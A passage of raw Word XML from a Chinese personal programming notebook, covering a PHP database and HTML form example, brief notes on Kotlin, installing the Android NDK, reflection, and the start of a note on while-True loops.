    </w:p>
    <w:p w14:paraId="6E3FAB98" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DDC479" w14:textId="19D860F2" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$pdo = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B52A8E" w14:textId="3DC7175F" w:rsidR="0077554E" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B8CA29" w14:textId="4F393C29" w:rsidR="0077554E" w:rsidRDefault="006F6E4E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="751" w:name="_Toc159780179"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交参数的表单</w:t>
      </w:r>
      <w:bookmarkEnd w:id="751"/>
    </w:p>
    <w:p w14:paraId="7321EA53" w14:textId="77777777" w:rsidR="0077554E" w:rsidRDefault="0077554E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD19E8B" w14:textId="77777777" w:rsidR="00764D64" w:rsidRDefault="00764D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC24E6" w14:textId="77777777" w:rsidR="00764D64" w:rsidRDefault="00764D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE047E0" w14:textId="77777777" w:rsidR="00764D64" w:rsidRDefault="00764D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;meta charset="utf8"&gt;&lt;title&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统计姓名和年龄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63321851" w14:textId="77777777" w:rsidR="00764D64" w:rsidRDefault="00764D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/head&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DBC142" w14:textId="77777777" w:rsidR="00764D64" w:rsidRDefault="00764D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7091AEAE" w14:textId="77777777" w:rsidR="00764D64" w:rsidRDefault="00764D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;form action="receive.php" method="get"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE741C6" w14:textId="77777777" w:rsidR="00764D64" w:rsidRDefault="00764D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;input type="text" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>姓名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" name="name"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D30673" w14:textId="77777777" w:rsidR="00764D64" w:rsidRDefault="00764D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;input type="text" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年龄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" name="age"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAB2220" w14:textId="77777777" w:rsidR="00764D64" w:rsidRDefault="00764D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;input type="submit" value="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F48EFE1" w14:textId="77777777" w:rsidR="00764D64" w:rsidRDefault="00764D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2764CD" w14:textId="77777777" w:rsidR="00764D64" w:rsidRDefault="00764D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088E00CA" w14:textId="3E52F30D" w:rsidR="006F6E4E" w:rsidRDefault="00764D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF7C07C" w14:textId="77777777" w:rsidR="006F6E4E" w:rsidRDefault="006F6E4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48022BE1" w14:textId="77777777" w:rsidR="006F6E4E" w:rsidRDefault="006F6E4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED53A9E" w14:textId="77777777" w:rsidR="006F6E4E" w:rsidRDefault="006F6E4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="401E5603" w14:textId="77777777" w:rsidR="0077554E" w:rsidRPr="0077554E" w:rsidRDefault="0077554E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A18291" w14:textId="77777777" w:rsidR="009249F1" w:rsidRDefault="009249F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CFC9F38" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62751D81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="752" w:name="_Toc159780180"/>
      <w:r>
        <w:t>kotlin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="752"/>
    </w:p>
    <w:p w14:paraId="41F9C8DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Kotlin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以编译成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码，也可以编译成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，方便在没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JVM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的设备上运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269B8873" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Google I/O 2017</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Google </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宣布</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kotlin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Android </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方开发语言。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CE662A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0432308E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://www.runoob.com/kotlin/kotlin-tutorial.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147D5C27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本可以理解为简化版的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28451039" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8C1C31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26227A90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C4BC68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="753" w:name="_Toc159780181"/>
      <w:r>
        <w:t>Android</w:t>
      </w:r>
      <w:bookmarkEnd w:id="753"/>
    </w:p>
    <w:p w14:paraId="7D7CB04D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338487F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="754" w:name="_Toc159780182"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="754"/>
    </w:p>
    <w:p w14:paraId="7E60CA4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="755" w:name="_Toc159780183"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="755"/>
    </w:p>
    <w:p w14:paraId="623DAEF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://zhuanlan.zhihu.com/p/415536928</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736DD5D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B10446" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Native Development Kit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一个工具开发包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFDDEC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7257461C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的安装，可以安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Android Studio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后（仅安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Android Studio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是不会安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的），继续在软件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sdk manager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SDK manager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SDK Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中找，不要在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SDK Platforms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中找，找不到）中安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NDK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1929A2A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D5090BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46CDA0D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A02D73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FC6A58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E889C72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F774DA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EEAB817" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA51BA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6222B294" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="756" w:name="_Toc159780184"/>
      <w:r>
        <w:t>算法及其他常识</w:t>
      </w:r>
      <w:bookmarkEnd w:id="756"/>
    </w:p>
    <w:p w14:paraId="6829BA98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E84977" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="757" w:name="_Toc159780185"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编程语言中的反射是什么意思</w:t>
      </w:r>
      <w:bookmarkEnd w:id="757"/>
    </w:p>
    <w:p w14:paraId="21571174" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.zhihu.com/question/438026258</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244563F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15189F86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单来说，反射</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是你想知道自己的类，的实例，在运行的时候本身具有什么方法、属性，然后去调用。比如，你知道这个实例有个方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getName</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后你想让他通过字符串</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getName</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去调用自己，这就应该去使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反射</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC9245" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="337462EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="758" w:name="_Toc159780186"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>whileTrue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的危害以及避免进入短期的循环语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="758"/>
    </w:p>
    <w:p w14:paraId="1303A2F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该背景在我优化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爬虫时重新思考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8FD685" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如，我喜欢在代码的多线程中写如下语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6225584C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB94D5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>while len(global_components_deque) &lt; 300</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D94531" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">while len(global_components_deque) &gt; 0 and </w:t>
      </w:r>
      <w:bookmarkStart w:id="759" w:name="OLE_LINK12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>signal_CLEAN_FREEDISK.empty() == True</w:t>
      </w:r>
      <w:bookmarkEnd w:id="759"/>
      <w:r>
